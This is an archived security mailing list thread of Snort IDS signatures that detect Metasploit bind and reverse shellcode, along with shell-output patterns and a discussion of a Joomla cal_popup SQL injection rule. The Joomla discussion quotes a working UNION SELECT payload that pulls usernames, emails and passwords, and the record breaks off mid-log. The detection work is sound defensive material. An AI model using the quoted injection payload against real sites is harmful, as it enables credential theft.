>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|17 1c 1a 19 fb 77 80 ce|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666005; rev:5;)
>>
>>
>> #BSD Bind Shell - ENCODE: Pex
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|c9 83 e9 ec e8 ff ff ff ff c0 5e 81 76 0e|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666006; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666007; rev:5;)
>>
>>
>> #BSD Bind Shell - ENCODE: None
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|6a 61 58 99 52 68 10 02|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666008; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|89 e1 52 42 52 42 52 6a 10 cd 80 99 93 51 53 52
>> 6a
>> 68 58 cd|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666009;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|80 b0 6a cd 80 52 53 52 b0 1e cd 80 97 6a 02 59
>> 6a
>> 5a 58 51|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666010;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|57 51 cd 80 49 79 f5 50 68 2f 2f 73 68 68 2f 62
>> 69
>> 6e 89 e3|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666011;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|50 54 53 53 b0 3b cd 80|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666012; rev:5;)
>>
>>
>>
>> #BSD Bind Shell - ENCODE: PexAlphaNum
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 4f 49 49 49 49 49
>> 49
>> 51 5a 56|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666012;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|54 58 36 33 30 56 58 34 41 30 42 36 48 48 30 42
>> 33
>> 30 42 43|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666013;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54
>> 42
>> 44 51 42|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666014;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|30 41 44 41 56 58 34 5a 38 42 44 4a 4f 4d 4c 36
>> 41|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:1066615;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|41 4e 44 35 44 34 44|";
>> classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666016; rev:5;)
>>
>>
>>
>> #BSD Bind Shell - ENCODE: PexFstEnvMov
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|6a 14 59 d9 ee d9 74 24 f4 5b 81 73 13|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666017; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666018; rev:5;)
>>
>>
>> #BSD Bind Shell - ENCODE: JmpCallAditive
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef
>> ff
>> ff ff|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666019;
>> rev:5;)
>>
>>
>> #BSD Bind Shell - ENCODE: Alpha2
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 49 49 49 49 49 49
>> 49
>> 49 49 49|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666020;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|41 42 32 42 41 32 41 41 30 41 41 58|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666021; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Bind shell"; content:"|49 72 4e 4e 69 6b 53|";
>> classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666022; rev:5;)
>> #### EOF BSD BIND SHELL ######
>>
>>
>>
>>
>>
>> ### BSD REVERSE SHELL #######
>> #BSD Reverse Shell - ENCODE: PexFnstenvSub
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|c9 83 e9 ef d9 ee d9 74 24 f4 5b 81 73 13|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666023; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666024; rev:5;)
>>
>>
>> #BSD Reverse Shell - ENCODE: Countdown
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|6a 43 59 e8 ff ff ff ff c1 5e 30 4c 0e 07 e2
>> fa
>> 6b 63 5b 9d|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666025;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|9f f6 72 09 4b 4b 4d 8a 74 7d 78 ec a2 49 26
>> 7c
>> 96 7d 79 7e|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666026;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|7b e6 ac 64 57 d9 60 59 1d 1c 47 5d 5e 18 5a
>> 50
>> 54 b2 df 6d|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666027;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|57 44 55 4a 5b 62|";
>> classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666028; rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: Pex
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|c9 83 e9 ef e8 ff ff ff ff c0 5e 81 76 0e|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666029; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666030; rev:5;)
>>
>>
>> #BSD Reverse Shell - ENCODE: None
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|51 cd 80 49 79 f6 50 68 2f 2f 73 68 68 2f 62
>> 69
>> 6e 89 e3 50|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666031;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|6a 61 58 99 52 42 52 42 52 68|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666032; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|89 e1 6a 10 51 50 51 97 6a 62 58 cd 80 6a 02
>> 59
>> b0 5a 51 57|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666033;
>> rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: PexAlphaNum
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|44 32 4d 4c 42 48 4a 46 42 31 44 50 50 41 4e
>> 4f
>> 49 38 41 4e|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666034;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|4c 36 42 41 41 35 42 45 41 35 47 59 4c 36 44
>> 56
>> 4a 35 4d 4c|"; classtype:shellcode-detect; sid:10666035; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44
>> 54
>> 42 44 51 42|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666036;
>> rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: PexFnstenvMov
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|6a 11 59 d9 ee d9 74 24 f4 5b 81 73 13|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666037; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
>> nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666038; rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: JmpCallAditive
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8
>> ef
>> ff ff ff|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666039;
>> rev:5;)
>>
>>
>>
>> #BSD Reverse Shell - ENCODE: Alpha2
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|49 49 49 49 49 49 49 51 5a 6a|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666040; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|58 50 30 42 31 41 42 6b 42 41|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666041; rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD Reverse shell"; content:"|32 41 41 30 41 41 58 50 38 42 42 75|";
>> classtype:shellcode-detect; nocase; distance:0; flow:established,to_server;
>> reference:url,www.metasploit.com; sid:10666042; rev:5;)
>> ##### EOF BSD Reverse Shell#####
>>
>>
>>
>>
>> ##### BSD SPARC Bind Shell #########
>> #BSD SPARC Bind Shell - ENCODE: SPARC
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03
>> e0
>> 20 aa 9d 40 11|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666043;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf
>> ff
>> fb 9e 03 e0 04|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666044;
>> rev:5;)
>>
>>
>> #BSD SPARC Bind Shell - ENCODE: None
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94 10
>> 20
>> 10 82 10 20 68|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666045;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|91 d0 20 08 d0 03 bf f8 92 10 20 01 82 10
>> 20
>> 6a 91 d0 20 08|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666046;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|d0 03 bf f8 92 1a 40 09 94 12 40 09 82 10
>> 20
>> 1e 91 d0 20 08|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666047;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Bind shell"; content:"|23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b
>> bf
>> f0 d0 23 bf f8|"; classtype:shellcode-detect; sid:10666048; rev:5;)
>> #### EOF BSD SPARC Bind Shell #########
>>
>>
>> ### BSD SPARC Reverse Shell ########
>> #BSD SPARC Reverse Shell - ENCODE: None
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|9c 2b a0 07 94 1a c0 0b 92 10 20 01 90
>> 10
>> 20 02 82 10 20 61|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666049;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|91 d0 20 08 d0 23 bf f8 92 10 20 03 92
>> a2
>> 60 01 82 10 20 5a|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666050;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|91 d0 20 08 12 bf ff fd d0 03 bf f8 21
>> 3f
>> c0|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666051;
>> rev:5;)
>>
>> #BSD SPARC Reverse Shell - ENCODE: SPARC
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea
>> 03
>> e0 20 aa 9d 40 11|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666052;
>> rev:5;)
>> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET
>> METASPLOIT:
>> BSD SPARC Reverse shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12
>> bf
>> ff fb 9e 03 e0 04|"; classtype:shellcode-detect; nocase; distance:0;
>> flow:established,to_server; reference:url,www.metasploit.com; sid:10666053;
>> rev:5;)
>> #### EOF BSD SPARC Reverse Shell ####
>>
>>
>>
>>
>>
>>
>>
>> #
>> ### Shellcode develop patron by h0f JennyLab
>> # Alberto Garcia de Dios
>> # albertogdedios at andaluciajunta.es
>>
>>
>> # Alpha payload
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
>> shellcode"; content:"|49 49 49 49 49 49 49 49 49 49|";
>> classtype:shellcode-detect; flow:established,to_server; distance:0;
>> sid:10666054; rev:5; nocase;)
>>
>>
>>
>>
>> # Call payload label and pop next bytes.
>>   #jmp short loader
>>   #label:
>>   #      code here
>>   #loader:
>>   # call label <--- here
>>   # db '/bin/bash'
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Possible Alpha
>> shellcode"; content:"|e8|"; content:"|ff ff ff|"; distance:1;
>> classtype:shellcode-detect; flow:established,to_server;
>> reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666055;
>> rev:5;
>> nocase;)
>>
>>
>>
>>
>>
>> # xor eax, eax | xor ebx, ebx
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor detect";
>> content:"|31 c0 31 db|"; classtype:shellcode-detect;
>> flow:established,to_server;
>> reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666056;
>> rev:5;
>> nocase;)
>>
>>
>>
>> # mov al, 0x01 | int 0x80
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit
>> syscall";
>> content:"|b0 01 cd 80|"; classtype:shellcode-detect;
>> flow:established,to_server;
>> reference:url,www.jennylab.org/codes/MultiString.opcode; sid:10666057;
>> rev:5;
>> nocase;)
>>
>>
>>
>> # pop ebx on call returned and two interruptions in 60 bytes.
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode ebx pop and
>> interrupt call"; content:"|5b|"; content:"|cd 80|"; content:"|cd 80|";
>> within:60; classtype:shellcode-detect; flow:established,to_server;
>> sid:10666058; rev:5;)
>>
>>
>> # pop ecx to use in interruption and before jmp to label data loader
>> # VMWare 2 server ( 8088 default port ) false positive.
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode pop ecx and
>> call interrupt"; content:"|eb|"; content:"|59|"; content:"|cd 80|";
>> within:512; classtype:shellcode-detect; flow:established,to_server;
>> sid:10666059; rev:5;)
>>
>>
>> # three push ( bsd shellcodes use very match push ) | very much false
>> positive
>> on ssh and other services. use !$SSH_PORT ( before define var ).
>> #alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode push";
>> content:"|68|"; content:"|68|"; content:"|68|"; content:"|68|"; within:12;
>> classtype:shellcode-detect; flow:established,to_server; sid:10666060;
>> rev:5;)
>>
>>
>> # xor all regs
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode xor all
>> registers"; content:"|31 c0|"; content:"|31 db|"; content:"|31 c9|";
>> content:"|31 d2|"; distance:1; classtype:shellcode-detect;
>> flow:established,to_server;
>> reference:url,www.jennylab.org/codes/SimplePrint.opcode; sid:10666061;
>> rev:5;
>> nocase;)
>>
>>
>>
>> #jmp out of seh win32 exploit \xEB\x06\x90\x90 | jmp +6 - nop - nop (
>> multiple
>> exploits use).
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode jmp out of
>> seh
>> win32 exploit."; content:"|eb 06 90 90|"; classtype:shellcode-detect;
>> flow:established,to_server; sid:10666062; rev:5;)
>>
>>
>> # movl $0x01, %al | int 0x91
>> alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET Shellcode exit
>> Solaris.";
>> content:"|b0 01 cd 91|"; classtype:shellcode-detect;
>> flow:established,to_server; sid:106669063; rev:5; nocase;)
>>
>>
>>
>> #
>> # WINDOWS SHELL
>> #
>>
>> # C:\masm32> or C:\>
>> # *:\*>
>> #alert tcp any any -> any any (msg:"ET Windows shell execution 001";
>> pcre:"/\w\:\x5c.*\x3c/"; sid:966600090; rev:1;)
>> # \w\:\\.*\>
>> alert tcp any any -> any any (msg:"ET Windows shell execution 001";
>> pcre:"/\w\:\\.*\>/"; sid:966600090; rev:1;)
>>
>>
>> # 12 dirs  83.453.632.512 bytes free
>> # * dirs * bytes *
>> alert tcp any any -> any any (msg:"ET Windows dir shell execution 001";
>> pcre:"/.*\d+\sdirs\s+.*bytes.*/"; sid:966600091; rev:1;)
>>
>> # 2 Dir(s)  37.604.442.112 bytes free
>> # * Dir(s) * bytes *
>> alert tcp any any -> any any (msg:"ET Windows dir shell execution 002";
>> pcre:"/.*\d+\sDir\(s\)\s+.*bytes.*/"; sid:966600095; rev:1;)
>>
>>
>> # 02/03/2009  23:51    <DIR>          masm32
>> # **/**/**** **:** <DIR> *
>> alert tcp any any -> any any (msg:"ET Windows dir shell execution 003";
>> pcre:"/\d{2}/\d{2}/\d{4}\s+\d{2}\:\d{2}\s+<DIR>\s+.*/"; sid:966600092;
>> rev:1;)
>>
>>
>> # %systemroot%
>> alert tcp any any -> any any (msg:"ET Windows systemroot var"; content:"|25
>> 73
>> 79 73 74 65 6d 72 6f 6f 74 25|"; sid:966600093; rev:1; nocase;)
>>
>>
>> # reg (query|add|delete|copy|save|restore|load|unload|compare|export|import)
>> alert tcp any any -> any any (msg:"ET Windows registry edit"; content:"reg
>> ";
>> pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import|flags).*/";
>> nocase; sid:966600094; rev:1;)
>>
>>
>>
>> #
>> # Unix shell
>> #
>>
>> # command >&0 <--- write on std with non create pipe shellcode
>> alert tcp any any -> any any (msg:"ET Unix write out on std posible reverse
>> shell"; pcre:"/.*>\&0/";sid:966608004; rev:1;)
>>
>>
>> #Unix bash user and root ($ and #).
>> #h0f at OpenSolarisLab:~$ | root at OpenSolarisLab:~#
>> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
>> pcre:"/.*\@.*\:\~\W(#|$)/";sid:966608005; rev:1;)
>>
>> #Unix sh and pure bash ($ and #)
>> # sh-3.2$ | sh-3.2#   /  bash-3.2$ | bash-3.2#
>> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
>> pcre:"/(sh|bash)\-\d\.\d\W(#|$)/";sid:966608006; rev:1;)
>>
>>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



From mike.cox52 at gmail.com  Tue Dec  1 09:47:31 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Tue, 1 Dec 2009 08:47:31 -0600
Subject: [Emerging-Sigs] Joomla sql injection sig
In-Reply-To: <9255886c0911301738s4b2bc85fl966ff35f55cd589f@mail.gmail.com>
References: <23E4FB52-E6A0-4E36-B79A-07B116A12AD0@auckland.ac.nz>
	<9255886c0911301735k74bf8d95i429625c6e2639de6@mail.gmail.com>
	<9255886c0911301738s4b2bc85fl966ff35f55cd589f@mail.gmail.com>
Message-ID: <6116b9e20912010647h1ddf8d8dm6a1a287bc06bf6d4@mail.gmail.com>

If extid is expected to be a number, why not something like this:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
WEB_SPECIFIC_APPS Joomla cal popup plugin SQL Injection";
flow:established,to_server; uricontent:"/cal_popup.php?"; nocase;
uricontent:"extid="; nocase;
pcre:"/\x2Fcal_popup.php\x3F.*extid\x3D[^\x26]*[^\d\x26]/Ui";
classtype:web-application-attack;)

Or to detect an injection attempt and not just a malformed request you
could do this instead and reduce false positives:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
WEB_SPECIFIC_APPS Joomla cal popup plugin SQL Injection";
flow:established,to_server; uricontent:"/cal_popup.php?"; nocase;
uricontent:"extid="; nocase;
pcre:"/\x2Fcal_popup.php\x3F.*extid\x3D[^\x26]*[\x27\x22]/Ui";
classtype:web-application-attack;)

I hate having a dot-star in a PCRE and initially had [^\s] but if it
is matching against the normalized URI buffer then encoded whitespace
would be unencoded during the match and we could end up with false
negatives.

Mike Cox

On 11/30/09, Rodrigo Montoro(Sp0oKeR) <spooker at gmail.com> wrote:
> Wrong answer ... i need to fix my pcre =/
>
> data>
> extid=0%27+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*&id=1
> No match
> data>
>
>
> But I think if we follow my idea it will work fine , just need to
> write the correct pcre =).
>
> Regards,
>
> On Mon, Nov 30, 2009 at 11:35 PM, Rodrigo Montoro(Sp0oKeR)
> <spooker at gmail.com> wrote:
>> We could use some pcre as I tested since I understand that
>> extid=NUMERIC_VALUE
>>
>> re> /extid=.*\D+$/gi
>>
>> data>extid=0%27+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*
>>
>> 0:extid=0%27+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*
>>
>> data> extid=1&id=1
>> No match
>>
>> data> extid=a
>> ?0: extid=a
>>
>> data> extid=100000000000000000
>> No match
>> data>
>>
>> What do you think ? It's more difficult to evade =)
>>
>>
>> Regards,
>> On Mon, Nov 30, 2009 at 7:58 PM, Russell Fulton <r.fulton at auckland.ac.nz>
>> wrote:
>>> We had a site done by this one a couple of days ago. ?Snort did not pick
>>> it up...
>>>
>>> this was joomla ?1.0.15 -- we are not aware of any advisories for this
>>> issue/
>>>
>>> this sig is untested.
>>>
>>> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
>>> WEB_SPECIFIC_APPS Joomla cal popup plugin SQL Injection";
>>> flow:established,to_server; uricontent:"/cal_popup.php?"; nocase;
>>> uricontent:"extid="; nocase; uricontent:"UNION"; nocase;
>>> pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack;....
>>>
>>>
>>> samples from the logs (can these go in the wiki ?).
>>>
>>>>
>>>> 88.224.222.64 - - [27/Nov/2009:06:42:37 +1300] "GET
